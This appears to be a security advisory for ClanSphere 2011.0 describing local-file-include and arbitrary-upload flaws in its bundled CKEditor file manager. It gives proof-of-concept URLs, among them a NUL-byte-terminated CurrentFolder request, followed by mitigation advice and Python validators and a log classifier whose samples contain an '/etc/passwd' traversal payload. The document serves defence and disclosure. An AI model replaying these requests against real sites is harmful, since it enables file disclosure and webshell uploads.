ClanSphere Local File Inclusion and Arbitrary File Upload Vulnerabilities - exploit.company
Vendor: ClanSphere
By:
CVSS: 7.5 (HIGH)
Vulnerability type: Local File Inclusion, Arbitrary File Upload
CWE:
Product Name: ClanSphere
Affected Version From: ClanSphere 2011.0
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

ClanSphere Local File Inclusion and Arbitrary File Upload Vulnerabilities

ClanSphere 2011.0 is prone to a local file-include vulnerability and to multiple arbitrary-file-upload vulnerabilities. Both live in the CKEditor file manager bundled under mods/ckeditor/filemanager/. The local file include is reached through the CurrentFolder parameter of the connector's FileUpload command (connectors/php/connector.php): the proof of concept supplies a path terminated with a %00 (NUL) byte, so the connector operates on an attacker-chosen local path instead of a folder below its upload directory. The arbitrary uploads come from the test and browser pages shipped with the file manager (connectors/test.html, connectors/uploadtest.html, browser/default/browser.html and browser/default/frmupload.html), which expose the upload function directly. An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information. Other versions may also be affected.

Mitigation:

No patch is listed on this page (Patch Exists: NO above). Upgrade to a non-vulnerable version if the vendor provides one; otherwise remove the file manager's test and browser pages (test.html, uploadtest.html, browser.html, frmupload.html) from the web root and restrict connector.php to authenticated users, or block the whole mods/ckeditor/filemanager/ path at the web server. Note that PHP 5.3.4 and later refuse file-system paths containing a NUL byte, which blocks the %00 truncation the local-file-include proof of concept depends on, but this does nothing for the upload pages, which need to be removed or access-controlled regardless.
Source: Exploit-DB raw data

source: https://www.securityfocus.com/bid/47636/info

ClanSphere 2011.0 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/mods/ckeditor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=[LFI]%00
http://www.example.com/[path]/mods/ckeditor/filemanager/connectors/test.html
http://www.example.com/[path]/mods/ckeditor/filemanager/connectors/uploadtest.html
http://www.example.com/[path]/mods/ckeditor/filemanager/browser/default/browser.html
http://www.example.com/[path]/mods/ckeditor/filemanager/browser/default/frmupload.html
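The following Python is an added illustration and is not part of the advisory or of ClanSphere's own (PHP) code. It shows the two checks a hardened connector would apply to the values the proof of concept above abuses, the CurrentFolder path and the uploaded file name, and a classifier for web-server access-log lines that flags requests to the connector and to the bundled test and browser pages listed above. UPLOAD_ROOT, the extension lists and the log lines are constructed for the example; ClanSphere's real upload directory and policy are not given on this page.

```python
import posixpath
import re
from typing import Callable, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed for this example: the only directory the connector may serve.
UPLOAD_ROOT = "/var/www/clansphere/uploads"

# Assumed allow-list of benign extensions; tune to what the site really needs.
ALLOWED_EXT = {"gif", "jpg", "jpeg", "png", "pdf", "zip"}
# Extensions the web server may execute. Every suffix is checked, so a
# double-extension name such as shell.php.jpg is rejected as well.
DENIED_EXT = {"php", "php3", "php4", "php5", "phtml", "phar", "htaccess"}

# Paths from the proof of concept (connector plus bundled test/browser pages).
PROBE_RE = re.compile(
    r"/mods/ckeditor/filemanager/(connectors/(php/connector\.php|test\.html|"
    r"uploadtest\.html)|browser/default/(browser|frmupload)\.html)",
    re.IGNORECASE,
)


def resolve_folder(current_folder: str, root: str = UPLOAD_ROOT) -> str:
    """Hardened handling of a file-manager CurrentFolder parameter.

    Returns the absolute folder below ``root`` or raises ValueError. The PoC's
    trailing %00 relies on a NUL byte cutting off whatever the connector
    appends to the parameter, so NUL bytes, traversal components and anything
    that resolves outside the root are refused rather than normalised away.
    """
    folder = unquote(current_folder)
    if "\x00" in folder:
        raise ValueError("NUL byte in CurrentFolder")
    if not folder.startswith("/") or "\\" in folder:
        raise ValueError("CurrentFolder must be a /-separated path below the root")
    if ".." in folder.split("/"):
        raise ValueError("path traversal in CurrentFolder")
    full = posixpath.normpath(posixpath.join(root, folder.lstrip("/")))
    if full != root and not full.startswith(root + "/"):
        raise ValueError("CurrentFolder escapes the upload root")
    return full


def validate_upload_name(filename: str) -> str:
    """Accept a plain base name with an allow-listed, non-executable extension."""
    name = unquote(filename)
    if "\x00" in name or "/" in name or "\\" in name:
        raise ValueError("illegal character in file name")
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        raise ValueError("file name needs a base name and an extension")
    suffixes = parts[1:]
    if any(s in DENIED_EXT for s in suffixes):
        raise ValueError("executable extension in file name")
    if suffixes[-1] not in ALLOWED_EXT:
        raise ValueError("extension not in allow-list")
    return name


def rejects(check: Callable[[str], str], value: str) -> bool:
    """True when ``check`` refuses ``value`` with ValueError."""
    try:
        check(value)
    except ValueError:
        return True
    return False


def flag_request(log_line: str) -> Optional[str]:
    """Classify one combined-format access-log line.

    Returns a short reason when the request targets the file-manager
    connector or one of its bundled pages, otherwise None.
    """
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', log_line)
    if not m or not PROBE_RE.search(m.group(1)):
        return None
    url = urlsplit(m.group(1))
    reasons = []
    if "\x00" in unquote(url.query):
        reasons.append("NUL byte in query")
    if parse_qs(url.query).get("Command", [""])[0] == "FileUpload":
        reasons.append("connector FileUpload command")
    if url.path.lower().endswith(".html"):
        reasons.append("bundled test/browser page requested")
    return "; ".join(reasons) or "filemanager connector request"


# Constructed sample log lines, not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/May/2011:10:00:01 +0000] "GET /mods/ckeditor/filemanager/'
    'connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder='
    '../../../../etc/passwd%00 HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/May/2011:10:00:02 +0000] "GET /mods/ckeditor/filemanager/'
    'connectors/uploadtest.html HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/May/2011:10:00:03 +0000] "GET /index.php?mod=news HTTP/1.1" 200 8192',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(flag_request(line), "<-", line.split('"')[1])
    for value in ["/Image/", "/../../../../etc/passwd%00", "Image"]:
        print(value, "->", "rejected" if rejects(resolve_folder, value) else resolve_folder(value))
```

In a deployment the two validators run before any file-system access in the connector, and the log classifier is a starting point for a SIEM or IDS rule to spot probing of the paths above; neither replaces removing the test pages and access-controlling the connector.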